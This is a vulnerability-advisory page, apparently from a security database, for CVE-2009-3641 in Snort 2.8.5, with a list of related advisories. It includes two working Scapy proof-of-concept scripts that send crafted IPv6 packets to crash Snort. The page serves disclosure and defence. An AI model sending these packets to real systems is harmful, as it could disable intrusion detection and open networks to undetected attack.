Snort 2.8.5 Denial-of-Service Vulnerabilities IPv
Reporter | Title | Published | Views | Family All 17 |
---|---|---|---|---|
Debian CVE | CVE-2009-3641 | 28 Oct 200914:30 | – | debiancve |
UbuntuCve | CVE-2009-3641 | 28 Oct 200900:00 | – | ubuntucve |
OpenVAS | Fedora Core 10 FEDORA-2009-10751 (snort) | 3 Dec 200900:00 | – | openvas |
OpenVAS | Fedora Core 10 FEDORA-2009-10751 (snort) | 3 Dec 200900:00 | – | openvas |
OpenVAS | Fedora Core 11 FEDORA-2009-10783 (snort) | 3 Dec 200900:00 | – | openvas |
OpenVAS | Snort 'IPv6' Packet Denial Of Service Vulnerability - Linux | 2 Nov 200900:00 | – | openvas |
OpenVAS | Fedora Core 11 FEDORA-2009-10783 (snort) | 3 Dec 200900:00 | – | openvas |
OpenVAS | Snort 'IPv6' Packet Denial Of Service Vulnerability (Linux) | 2 Nov 200900:00 | – | openvas |
CVE | CVE-2009-3641 | 28 Oct 200914:30 | – | cve |
Fedora | [SECURITY] Fedora 10 Update: snort-2.8.5.1-1.fc10 | 24 Nov 200907:35 | – | fedora |
source: https://www.securityfocus.com/bid/36795/info
Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets.
Attackers can exploit these issues to crash the affected application, causing denial-of-service conditions.
These issues affect Snort 2.8.5; other versions may also be vulnerable.
You can reproduce theses two differents bugs easily by using the Python low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)
1) #only works on x86
#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP
2) # works x86,x64
#/usr/bin/env python
from scapy.all import *
z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6)
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo